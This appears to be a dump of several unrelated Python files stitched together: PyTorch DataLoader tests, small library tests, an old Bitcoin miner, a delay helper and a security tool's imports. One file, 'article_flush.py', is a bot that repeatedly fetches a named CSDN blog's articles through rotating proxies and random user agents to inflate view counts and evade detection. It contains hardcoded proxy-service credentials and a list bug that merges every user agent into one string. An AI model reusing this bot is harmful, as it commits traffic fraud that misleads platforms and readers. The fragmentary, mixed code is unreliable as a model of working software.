self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
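# DummyDataset asserts that its `start` attribute still holds the value it had
# when the workers were spawned; test_dataset_not_reset below uses it to show
# that persistent workers never see later mutations of the dataset object.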
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# Persistent workers keep the original dataset alive for the
# lifetime of the dataloader, so its attributes remain the same as
# when the workers were first spawned (at the first dataloader iteration)
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super().__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)),
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect on the dataset
# cached by the workers, since they are not recreated between epochs
# and can cache values safely
dataset.start = i
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
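# SimpleCustomBatch illustrates the pin_memory()/is_pinned() protocol a custom
# batch type must implement for DataLoader(pin_memory=True) to pin it.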
class SimpleCustomBatch(object):
def __init__(self, data):
transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` cannot be correctly unpickled in a spawned worker module.
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
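# TestWorkerQueueDataset records, via its worker_init_fn, which worker produced
# each sample, so TestIndividualWorkerQueue below can verify that batches are
# dispatched to workers in round-robin order.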
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
for batch_size in (8, 16, 32, 64):
for num_workers in range(1, 6):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers)
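# SetAffinityDataset yields the CPU affinity of the worker process, so
# TestSetAffinity can check that a worker_init_fn calling os.sched_setaffinity
# has taken effect by the time the dataset is iterated.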
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [2])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [2])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution in the parent process (before DataLoader workers are forked)
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
|
article_flush.py
|
import sys
import json
import time
import urllib3
import hashlib
import requests
import random
from redis import StrictRedis
from lxml import etree
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from threading import Thread
from multiprocessing import Process
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
rc = StrictRedis(host='127.0.0.1', port='6380',)
article_set_key = 'article_hrefs'
proxy_agent = 'free'
# proxy_agent = 'xdali'
def make_proxy_from_xdali():
_version = sys.version_info
is_python3 = (_version[0] == 3)
orderno = "ZF202011236319vDqRo1"
secret = "2342494cc2b44a3ca09469513c771225"
ip = "forward.xdaili.cn"
port = "80"
ip_port = ip + ":" + port
timestamp = str(int(time.time()))
string = ""
string = "orderno=" + orderno + "," + "secret=" + secret + "," + "timestamp=" + timestamp
if is_python3:
string = string.encode()
md5_string = hashlib.md5(string).hexdigest()
sign = md5_string.upper()
#print(sign)
auth = "sign=" + sign + "&" + "orderno=" + orderno + "&" + "timestamp=" + timestamp
#print(auth)
proxy = {"http": "http://" + ip_port, "https": "https://" + ip_port}
headers = {"Proxy-Authorization": auth, "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36"}
value = {'proxy': proxy, 'headers': headers}
rc.set('proxy', json.dumps(value), ex=10)
return value
def get_proxy_from_xdali():
proxy_info = rc.get('proxy')
if proxy_info:
proxy_dict = json.loads(proxy_info)
else:
proxy_dict = make_proxy_from_xdali()
print('get proxy from web ...')
return proxy_dict
def make_proxy_from_free():
proxy = requests.get('http://127.0.0.1:5010/get').json().get('proxy', None)
if not proxy:
return
delete_proxy_from_free(proxy)
proxy_info = {"http": "http://{}".format(proxy)}
return proxy_info
def delete_proxy_from_free(proxy):
requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
def get_user_agent():
user_agent_list = [
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0"
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36"
"Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36"
"Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36"
"Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
]
headers = {"user-agent": random.choice(user_agent_list)}
return headers
def get_articles_info():
article_info_set = rc.smembers(article_set_key)
if article_info_set:
article_info_list = [json.loads(i.decode()) for i in article_info_set]
print('get articles info from redis...')
else:
article_info_list = parse_articles_info()
print('get articles info from web parse...')
return article_info_list
def parse_articles_info():
article_set_key = 'article_hrefs'
options = Options()
options.add_argument('--headless')
# options.add_argument('--proxy-server=' + proxy)
browser = webdriver.Chrome(options=options,)
browser.get('https://blog.csdn.net/littleRpl?spm=1001.2101.3001.5113')
elements_list = browser.find_elements_by_class_name('article-item-box')
article_info_list = []
rc.delete(article_set_key)
for element in elements_list:
sub_elem = element.find_element_by_tag_name('a')
read_num = element.find_element_by_class_name('read-num').text
href = sub_elem.get_attribute('href')
title = sub_elem.text
article_info = {'title': title, 'href': href}
article_info_list.append(article_info)
rc.sadd(article_set_key, json.dumps(article_info))
rc.expire(article_set_key, 4 * 60 * 60)  # cache the article list for 4 hours
return article_info_list
def get_read_count(text):
html = etree.HTML(text, etree.HTMLParser())
try:
read_count = html.xpath('//span[@class="read-count"]')[0].text
except:
read_count = '-'
return read_count
def read_article(article, proxy_or_agent=None):
url = article['href']
title = article['title']
if proxy_or_agent == 'free':
proxy = make_proxy_from_free()
headers = get_user_agent()
elif proxy_or_agent == 'xdali':
proxy_dict = make_proxy_from_xdali()
proxy = proxy_dict['proxy']
headers = proxy_dict['headers']
elif proxy_or_agent is None:
print(f'{title}, no proxy or agent, return back...')
return
else:
proxy = proxy_or_agent
headers = get_user_agent()
try:
r = requests.get(url, headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
except:
print(f'\t\t title: {title}, proxy access failed...')
return
else:
r.encoding = 'utf8'
if r.status_code == 200:
read_num = get_read_count(r.text)
# get_read_count() returns '-' when the counter could not be parsed
shown_count = int(read_num) + 1 if read_num.isdigit() else read_num
print(f'title: {title}, access ok, read_num: {shown_count}')
return
if r.status_code == 302 or r.status_code == 301:
loc = r.headers['Location']
r = requests.get(loc, headers=headers, proxies=proxy, verify=False, allow_redirects=False)
r.encoding = 'utf8'
if r.status_code != 200:
print(f'\t\t title: {title}, proxy access failed...')
return
else:
read_num = get_read_count(r.text)
print(f'title: {title}, read_num: {read_num}')
def access_all_articles():
articles_info_list = get_articles_info()
while True:
t0 = time.time()
t_list = []
# proxy = make_proxy_from_free()
# print(proxy)
for articles_info in articles_info_list:
t = Thread(target=read_article, args=[articles_info, 'free'])
t.start()
t_list.append(t)
[t.join() for t in t_list]
t1 = time.time() - t0
print(f'---------------- seconds: {t1} ---------------\n')
time.sleep(3)
def mutil():
for i in range(8):
p = Process(target=access_all_articles)
p.start()
if __name__ == '__main__':
# mutil()
# x = make_proxy_from_free()
# print(x)
access_all_articles()
|
test_collection.py
|
"""
Legalese
--------
Copyright (c) 2016 Genome Research Ltd.
Author: Colin Nolan <cn13@sanger.ac.uk>
This file is part of HGI's common Python library
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 3 of the License, or (at
your option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import copy
import unittest
from collections import defaultdict
from threading import Semaphore
from threading import Thread
from time import sleep
from hgicommon.collections import Metadata, ThreadSafeDefaultdict
class TestThreadSafeDefaultdict(unittest.TestCase):
"""
Tests for `ThreadSafeDefaultdict`.
"""
def test_is_defaultdict(self):
self.assertIsInstance(ThreadSafeDefaultdict(), defaultdict)
def test_getitem_can_be_used_to_get_values(self):
thread_safe_dict = ThreadSafeDefaultdict(object)
item_at_zero = thread_safe_dict[0]
self.assertEqual(thread_safe_dict[1], thread_safe_dict[1])
self.assertNotEqual(thread_safe_dict[2], thread_safe_dict[3])
self.assertEqual(item_at_zero, thread_safe_dict[0])
def test_getitem_is_threadsafe(self):
# `defaultdict` will fail this test!
number_of_threads = 100
values = []
def object_factory() -> object:
# This sleep triggers a context switch if there are other threads running
sleep(0.1)
created = object()
values.append(created)
return created
thread_safe_dict = ThreadSafeDefaultdict(object_factory)
values_of_foo = []
wait_semaphore = Semaphore(0)
def get_and_store_foo_value():
values_of_foo.append(thread_safe_dict["foo"])
wait_semaphore.release()
for _ in range(number_of_threads):
Thread(target=get_and_store_foo_value).start()
for _ in range(number_of_threads):
wait_semaphore.acquire()
assert len(values_of_foo) == number_of_threads
for i in range(number_of_threads - 1):
self.assertEqual(values_of_foo[i], values_of_foo[i + 1])
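# Illustrative sketch (added for clarity; this is NOT the hgicommon
# implementation, which may be written differently): the property exercised by
# test_getitem_is_threadsafe above is that concurrent lookups of the same
# missing key produce a single shared value, e.g. by guarding __missing__ with a lock.
from threading import Lock
class _ExampleThreadSafeDefaultdict(defaultdict):
    def __init__(self, *args, **kwargs):
        super(_ExampleThreadSafeDefaultdict, self).__init__(*args, **kwargs)
        self._lock = Lock()
    def __missing__(self, key):
        with self._lock:
            if key not in self:
                # First thread to take the lock runs the factory via defaultdict.__missing__
                return super(_ExampleThreadSafeDefaultdict, self).__missing__(key)
            # Another thread populated the key while we waited for the lock
            return self[key]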
class TestMetadata(unittest.TestCase):
"""
Tests for `Metadata`.
"""
_TEST_VALUES = {1: 2, 3: 4}
def setUp(self):
self.metadata = Metadata(TestMetadata._TEST_VALUES)
def test_init_with_no_values(self):
self.assertEqual(len(Metadata()), 0)
def test_init_with_values(self):
self.assertCountEqual(self.metadata.keys(), TestMetadata._TEST_VALUES.keys())
self.assertCountEqual(self.metadata.values(), TestMetadata._TEST_VALUES.values())
def test_get(self):
self.assertEqual(self.metadata.get(1), TestMetadata._TEST_VALUES[1])
self.assertEqual(self.metadata[1], TestMetadata._TEST_VALUES[1])
def test_rename(self):
self.metadata.rename(1, 10)
self.assertNotIn(1, self.metadata)
self.assertEqual(self.metadata[10], 2)
def test_rename_non_existent(self):
self.assertRaises(KeyError, self.metadata.rename, 10, 20)
def test_rename_to_same_name(self):
self.metadata.rename(1, 1)
self.assertEqual(self.metadata[1], 2)
def test_pop(self):
self.metadata.pop(1)
self.assertEqual(self.metadata, Metadata({3: 4}))
def test_clear(self):
self.metadata.clear()
self.assertEqual(self.metadata, Metadata())
def test_delete(self):
del self.metadata[1]
self.assertEqual(self.metadata, Metadata({3: 4}))
def test_len(self):
self.assertEqual(len(self.metadata), 2)
def test_items(self):
self.assertCountEqual(self.metadata.items(), [(1, 2), (3, 4)])
def test_values(self):
self.assertCountEqual(self.metadata.values(), [2, 4])
def test_keys(self):
self.assertCountEqual(self.metadata.keys(), [1, 3])
def test_eq_when_equal(self):
self.assertEqual(Metadata(TestMetadata._TEST_VALUES), Metadata(TestMetadata._TEST_VALUES))
def test_eq_when_not_equal(self):
self.assertNotEqual(Metadata(TestMetadata._TEST_VALUES), Metadata())
def test_repr(self):
string_representation = repr(self.metadata)
self.assertTrue(isinstance(string_representation, str))
def test_contains(self):
self.assertIn(1, self.metadata)
self.assertNotIn("a", self.metadata)
def test_copy(self):
self.assertEqual(copy.copy(self.metadata), self.metadata)
def test_deepcopy(self):
self.assertEqual(copy.deepcopy(self.metadata), self.metadata)
if __name__ == "__main__":
unittest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
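# Illustrative sketch (added for clarity; not part of the original miner).
# The proof-of-work test performed in Miner.work() below boils down to:
# double-SHA256 the 80-byte block header, read the byte-reversed digest as a
# 256-bit integer, and accept the nonce if that integer is below the target.
import binascii
def check_proof_of_work_example(header_80_bytes, target_int):
    digest = hashlib.sha256(hashlib.sha256(header_80_bytes).digest()).digest()
    # Bitcoin compares the hash in reversed byte order
    return int(binascii.hexlify(digest[::-1]), 16) < target_int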
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
deferred.py
|
import os
import time
import threading
def run(delaySeconds:float, func, *args, **kwargs):
assert isinstance(delaySeconds, (int,float))
assert callable(func)
def _threadFunc():
time.sleep(delaySeconds)
func(*args, **kwargs)
#
t = threading.Thread(target=_threadFunc)
t.start()
#
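# Illustrative usage (added sketch, not part of the original module): schedule a
# callback to fire two seconds from now without blocking the caller.
if __name__ == '__main__':
    def _demo(message):
        print(message)
    run(2.0, _demo, "deferred hello")
    print("scheduled; the main thread continues immediately")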
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
# from securetea.lib.notifs import secureTeaMalwareAnalysis
from securetea.lib.malware_analysis.malware_analysis_runner import SecureTeaMalwareAnalysis
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaWhatsapp
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.waf.Server import SecureTeaWaf
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.lib.social_engineering.socialEngineering import SecureTeaSocialEngineering
